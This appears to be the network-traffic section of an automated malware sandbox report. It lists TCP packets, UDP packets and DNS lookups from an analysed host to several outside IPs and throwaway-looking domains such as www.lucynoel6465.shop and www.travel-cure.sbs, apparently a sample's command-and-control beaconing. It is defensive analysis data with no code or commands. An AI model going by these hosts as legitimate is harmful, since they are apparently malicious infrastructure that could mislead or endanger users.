                                                                        Feb 18, 2025 08:14:25.312316895 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.312321901 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.312329054 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.312355995 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.312376976 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.312484980 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.312490940 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.312501907 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.312509060 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.312654972 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.312705040 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.312835932 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.312844992 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.312851906 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.312863111 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.312870026 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.312900066 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.313090086 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.313209057 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.313215017 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.313226938 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.313231945 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.313237906 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.313249111 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.313266039 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.313314915 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.313414097 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.313419104 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.313425064 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.313435078 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.313446045 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.313472986 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.323811054 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.323823929 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.323831081 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.323921919 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.323928118 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.323945045 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.323951006 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.323967934 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.323972940 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.323972940 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.323995113 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.323995113 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.324023962 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:29.604012012 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:29.604093075 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:34.725379944 CET5238053192.168.2.41.1.1.1
                                                                        Feb 18, 2025 08:14:34.730242968 CET53523801.1.1.1192.168.2.4
                                                                        Feb 18, 2025 08:14:34.730381966 CET5238053192.168.2.41.1.1.1
                                                                        Feb 18, 2025 08:14:34.735367060 CET53523801.1.1.1192.168.2.4
                                                                        Feb 18, 2025 08:14:35.184357882 CET5238053192.168.2.41.1.1.1
                                                                        Feb 18, 2025 08:14:35.189584017 CET53523801.1.1.1192.168.2.4
                                                                        Feb 18, 2025 08:14:35.189790010 CET5238053192.168.2.41.1.1.1
                                                                        Feb 18, 2025 08:14:36.512132883 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:15:07.496448040 CET5238180192.168.2.4104.21.16.1
                                                                        Feb 18, 2025 08:15:07.501332045 CET8052381104.21.16.1192.168.2.4
                                                                        Feb 18, 2025 08:15:07.501416922 CET5238180192.168.2.4104.21.16.1
                                                                        Feb 18, 2025 08:15:07.511040926 CET5238180192.168.2.4104.21.16.1
                                                                        Feb 18, 2025 08:15:07.516091108 CET8052381104.21.16.1192.168.2.4
                                                                        Feb 18, 2025 08:15:08.250482082 CET8052381104.21.16.1192.168.2.4
                                                                        Feb 18, 2025 08:15:08.250940084 CET8052381104.21.16.1192.168.2.4
                                                                        Feb 18, 2025 08:15:08.251076937 CET5238180192.168.2.4104.21.16.1
                                                                        Feb 18, 2025 08:15:08.251116037 CET8052381104.21.16.1192.168.2.4
                                                                        Feb 18, 2025 08:15:08.251157999 CET5238180192.168.2.4104.21.16.1
                                                                        Feb 18, 2025 08:15:08.255815029 CET5238180192.168.2.4104.21.16.1
                                                                        Feb 18, 2025 08:15:08.260546923 CET8052381104.21.16.1192.168.2.4
                                                                        Feb 18, 2025 08:15:23.428047895 CET5247980192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:23.432861090 CET8052479199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:23.432951927 CET5247980192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:23.448081017 CET5247980192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:23.453697920 CET8052479199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:23.924133062 CET8052479199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:23.924149036 CET8052479199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:23.924161911 CET8052479199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:23.924194098 CET5247980192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:23.924223900 CET5247980192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:24.964051962 CET5247980192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:25.983927011 CET5249580192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:25.988748074 CET8052495199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:25.988816023 CET5249580192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:26.004981041 CET5249580192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:26.010256052 CET8052495199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:26.471092939 CET8052495199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:26.471110106 CET8052495199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:26.471123934 CET8052495199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:26.471184015 CET5249580192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:27.511017084 CET5249580192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:28.529747963 CET5251180192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:28.534689903 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:28.534799099 CET5251180192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:28.554032087 CET5251180192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:28.718342066 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:28.718360901 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:28.718485117 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:28.719099045 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:28.720082045 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:28.720815897 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:28.720832109 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:28.721334934 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:28.721349955 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:29.004501104 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:29.004616976 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:29.004662991 CET5251180192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:29.005136013 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:29.005187988 CET5251180192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:30.057811022 CET5251180192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:31.076471090 CET5253280192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:31.081706047 CET8052532199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:31.081795931 CET5253280192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:31.090898037 CET5253280192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:31.095813990 CET8052532199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:31.565486908 CET8052532199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:31.565531969 CET8052532199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:31.565573931 CET8052532199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:31.565834999 CET5253280192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:31.568862915 CET5253280192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:31.573828936 CET8052532199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:36.590080023 CET5256880192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:36.595031977 CET805256813.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:36.595129967 CET5256880192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:36.608201027 CET5256880192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:36.613030910 CET805256813.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:37.053355932 CET805256813.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:37.053574085 CET805256813.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:37.053621054 CET5256880192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:38.227756023 CET5256880192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:39.233014107 CET5258480192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:39.237973928 CET805258413.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:39.238065958 CET5258480192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:39.254173994 CET5258480192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:39.259088039 CET805258413.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:39.727627039 CET805258413.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:39.727667093 CET805258413.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:39.727710962 CET5258480192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:40.760998011 CET5258480192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:41.779953957 CET5260080192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:41.784935951 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:41.785037041 CET5260080192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:41.802930117 CET5260080192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:41.807881117 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:41.807900906 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:41.807930946 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:41.807945013 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:41.807959080 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:41.808150053 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:41.808162928 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:41.808176041 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:41.808188915 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:42.251498938 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:42.257509947 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:42.257628918 CET5260080192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:43.308043003 CET5260080192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:44.326462030 CET5261980192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:44.331820965 CET805261913.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:44.331954956 CET5261980192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:44.341515064 CET5261980192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:44.346330881 CET805261913.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:44.792871952 CET805261913.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:44.793090105 CET805261913.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:44.793153048 CET5261980192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:44.796171904 CET5261980192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:44.800924063 CET805261913.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:49.827076912 CET5265680192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:49.831978083 CET8052656162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:49.832098007 CET5265680192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:49.852987051 CET5265680192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:49.857994080 CET8052656162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:50.452797890 CET8052656162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:50.452816010 CET8052656162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:50.453083038 CET5265680192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:51.354976892 CET5265680192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:52.373496056 CET5265780192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:52.378400087 CET8052657162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:52.378528118 CET5265780192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:52.394565105 CET5265780192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:52.399413109 CET8052657162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:52.974826097 CET8052657162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:52.974893093 CET8052657162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:52.974967003 CET5265780192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:53.901657104 CET5265780192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:54.920394897 CET5265880192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:54.925170898 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:54.925291061 CET5265880192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:54.941356897 CET5265880192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:54.946252108 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:54.946362972 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:54.946373940 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:54.946382999 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:54.946392059 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:54.946408987 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:54.946666956 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:54.946676016 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:54.946685076 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:55.550357103 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:55.550431013 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:55.550607920 CET5265880192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:56.448596001 CET5265880192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:57.467339039 CET5265980192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:57.472237110 CET8052659162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:57.472358942 CET5265980192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:57.481786966 CET5265980192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:57.486620903 CET8052659162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:58.060925961 CET8052659162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:58.061045885 CET8052659162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:58.061120033 CET5265980192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:58.064137936 CET5265980192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:58.068877935 CET8052659162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:16:03.194369078 CET5266080192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:16:03.199354887 CET805266013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:03.199457884 CET5266080192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:16:03.216617107 CET5266080192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:16:03.221759081 CET805266013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:03.676928043 CET805266013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:03.676947117 CET805266013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:03.677239895 CET5266080192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:16:04.729825020 CET5266080192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:16:05.749018908 CET5266180192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:16:05.753861904 CET805266113.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:05.753936052 CET5266180192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:16:05.771408081 CET5266180192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:16:05.776173115 CET805266113.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:06.212783098 CET805266113.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:06.212812901 CET805266113.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:06.212902069 CET5266180192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:16:07.276787043 CET5266180192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:16:08.297632933 CET5266280192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:16:08.302421093 CET805266213.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:08.303050041 CET5266280192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:16:08.324414968 CET5266280192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:16:08.329216957 CET805266213.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:08.329288960 CET805266213.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:08.329298973 CET805266213.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:08.329314947 CET805266213.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:08.329324007 CET805266213.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:08.329365015 CET805266213.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:08.329375029 CET805266213.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:08.329472065 CET805266213.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:08.329480886 CET805266213.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:08.769023895 CET805266213.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:08.775100946 CET805266213.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:08.776489019 CET5266280192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:16:09.823858976 CET5266280192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:16:10.853173971 CET5266380192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:16:10.860416889 CET805266313.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:10.862785101 CET5266380192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:16:10.872796059 CET5266380192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:16:10.877558947 CET805266313.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:14.361450911 CET805266313.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:14.361464977 CET805266313.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:14.361639023 CET5266380192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:16:14.364614010 CET5266380192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:16:14.372797966 CET805266313.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:16:19.397725105 CET5266480192.168.2.447.83.1.90
                                                                        Feb 18, 2025 08:16:19.402599096 CET805266447.83.1.90192.168.2.4
                                                                        Feb 18, 2025 08:16:19.402827024 CET5266480192.168.2.447.83.1.90
                                                                        Feb 18, 2025 08:16:19.431338072 CET5266480192.168.2.447.83.1.90
                                                                        Feb 18, 2025 08:16:19.436305046 CET805266447.83.1.90192.168.2.4
                                                                        Feb 18, 2025 08:16:20.933176041 CET5266480192.168.2.447.83.1.90
                                                                        Feb 18, 2025 08:16:20.938302994 CET805266447.83.1.90192.168.2.4
                                                                        Feb 18, 2025 08:16:20.938646078 CET5266480192.168.2.447.83.1.90
                                                                        Feb 18, 2025 08:16:22.530366898 CET5266580192.168.2.447.83.1.90
                                                                        Feb 18, 2025 08:16:22.536744118 CET805266547.83.1.90192.168.2.4
                                                                        Feb 18, 2025 08:16:22.536909103 CET5266580192.168.2.447.83.1.90
                                                                        Feb 18, 2025 08:16:22.552894115 CET5266580192.168.2.447.83.1.90
                                                                        Feb 18, 2025 08:16:22.557832003 CET805266547.83.1.90192.168.2.4
                                                                        Feb 18, 2025 08:16:24.058104038 CET5266580192.168.2.447.83.1.90
                                                                        Feb 18, 2025 08:16:24.063409090 CET805266547.83.1.90192.168.2.4
                                                                        Feb 18, 2025 08:16:24.063615084 CET5266580192.168.2.447.83.1.90
                                                                        Feb 18, 2025 08:16:25.078946114 CET5266680192.168.2.447.83.1.90
                                                                        Feb 18, 2025 08:16:25.084542990 CET805266647.83.1.90192.168.2.4
                                                                        Feb 18, 2025 08:16:25.084702969 CET5266680192.168.2.447.83.1.90
                                                                        Feb 18, 2025 08:16:25.102543116 CET5266680192.168.2.447.83.1.90
                                                                        Feb 18, 2025 08:16:25.107480049 CET805266647.83.1.90192.168.2.4
                                                                        Feb 18, 2025 08:16:25.107492924 CET805266647.83.1.90192.168.2.4
                                                                        Feb 18, 2025 08:16:25.107502937 CET805266647.83.1.90192.168.2.4
                                                                        Feb 18, 2025 08:16:25.107512951 CET805266647.83.1.90192.168.2.4
                                                                        Feb 18, 2025 08:16:25.107547998 CET805266647.83.1.90192.168.2.4
                                                                        Feb 18, 2025 08:16:25.107558012 CET805266647.83.1.90192.168.2.4
                                                                        Feb 18, 2025 08:16:25.107568026 CET805266647.83.1.90192.168.2.4
                                                                        Feb 18, 2025 08:16:25.107578993 CET805266647.83.1.90192.168.2.4
                                                                        Feb 18, 2025 08:16:25.108232021 CET805266647.83.1.90192.168.2.4
                                                                        Feb 18, 2025 08:16:26.604887009 CET5266680192.168.2.447.83.1.90
                                                                        Feb 18, 2025 08:16:26.609961987 CET805266647.83.1.90192.168.2.4
                                                                        Feb 18, 2025 08:16:26.610028982 CET5266680192.168.2.447.83.1.90
                                                                        Feb 18, 2025 08:16:27.624130964 CET5266780192.168.2.447.83.1.90
                                                                        Feb 18, 2025 08:16:27.632276058 CET805266747.83.1.90192.168.2.4
                                                                        Feb 18, 2025 08:16:27.632359982 CET5266780192.168.2.447.83.1.90
                                                                        Feb 18, 2025 08:16:27.642092943 CET5266780192.168.2.447.83.1.90
                                                                        Feb 18, 2025 08:16:27.647129059 CET805266747.83.1.90192.168.2.4
                                                                        Feb 18, 2025 08:16:29.218359947 CET805266747.83.1.90192.168.2.4
                                                                        Feb 18, 2025 08:16:29.218580008 CET805266747.83.1.90192.168.2.4
                                                                        Feb 18, 2025 08:16:29.221357107 CET5266780192.168.2.447.83.1.90

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Feb 18, 2025 08:14:34.721098900 CET53572401.1.1.1192.168.2.4
                                                                        Feb 18, 2025 08:15:07.467345953 CET5134853192.168.2.41.1.1.1
                                                                        Feb 18, 2025 08:15:07.484230995 CET53513481.1.1.1192.168.2.4
                                                                        Feb 18, 2025 08:15:23.296438932 CET5685353192.168.2.41.1.1.1
                                                                        Feb 18, 2025 08:15:23.425215006 CET53568531.1.1.1192.168.2.4
                                                                        Feb 18, 2025 08:15:36.576271057 CET6319853192.168.2.41.1.1.1
                                                                        Feb 18, 2025 08:15:36.587939978 CET53631981.1.1.1192.168.2.4
                                                                        Feb 18, 2025 08:15:49.812748909 CET5688553192.168.2.41.1.1.1
                                                                        Feb 18, 2025 08:15:49.824531078 CET53568851.1.1.1192.168.2.4
                                                                        Feb 18, 2025 08:16:03.077060938 CET5950553192.168.2.41.1.1.1
                                                                        Feb 18, 2025 08:16:03.191140890 CET53595051.1.1.1192.168.2.4
                                                                        Feb 18, 2025 08:16:19.375844955 CET6117753192.168.2.41.1.1.1
                                                                        Feb 18, 2025 08:16:19.394052029 CET53611771.1.1.1192.168.2.4

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Feb 18, 2025 08:15:07.467345953 CET192.168.2.41.1.1.10x7937Standard query (0)www.lucynoel6465.shopA (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:15:23.296438932 CET192.168.2.41.1.1.10xf27dStandard query (0)www.travel-cure.sbsA (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:15:36.576271057 CET192.168.2.41.1.1.10xdc0bStandard query (0)www.physicsbrain.xyzA (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:15:49.812748909 CET192.168.2.41.1.1.10xb2edStandard query (0)www.infiniteve.xyzA (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:16:03.077060938 CET192.168.2.41.1.1.10xc46aStandard query (0)www.weilaishijie.xyzA (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:16:19.375844955 CET192.168.2.41.1.1.10xdc90Standard query (0)www.dqvcbn.infoA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Feb 18, 2025 08:15:07.484230995 CET1.1.1.1192.168.2.40x7937No error (0)www.lucynoel6465.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:15:07.484230995 CET1.1.1.1192.168.2.40x7937No error (0)www.lucynoel6465.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:15:07.484230995 CET1.1.1.1192.168.2.40x7937No error (0)www.lucynoel6465.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:15:07.484230995 CET1.1.1.1192.168.2.40x7937No error (0)www.lucynoel6465.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:15:07.484230995 CET1.1.1.1192.168.2.40x7937No error (0)www.lucynoel6465.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:15:07.484230995 CET1.1.1.1192.168.2.40x7937No error (0)www.lucynoel6465.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:15:07.484230995 CET1.1.1.1192.168.2.40x7937No error (0)www.lucynoel6465.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:15:23.425215006 CET1.1.1.1192.168.2.40xf27dNo error (0)www.travel-cure.sbs199.59.243.160A (IP address)IN (0x0001)false
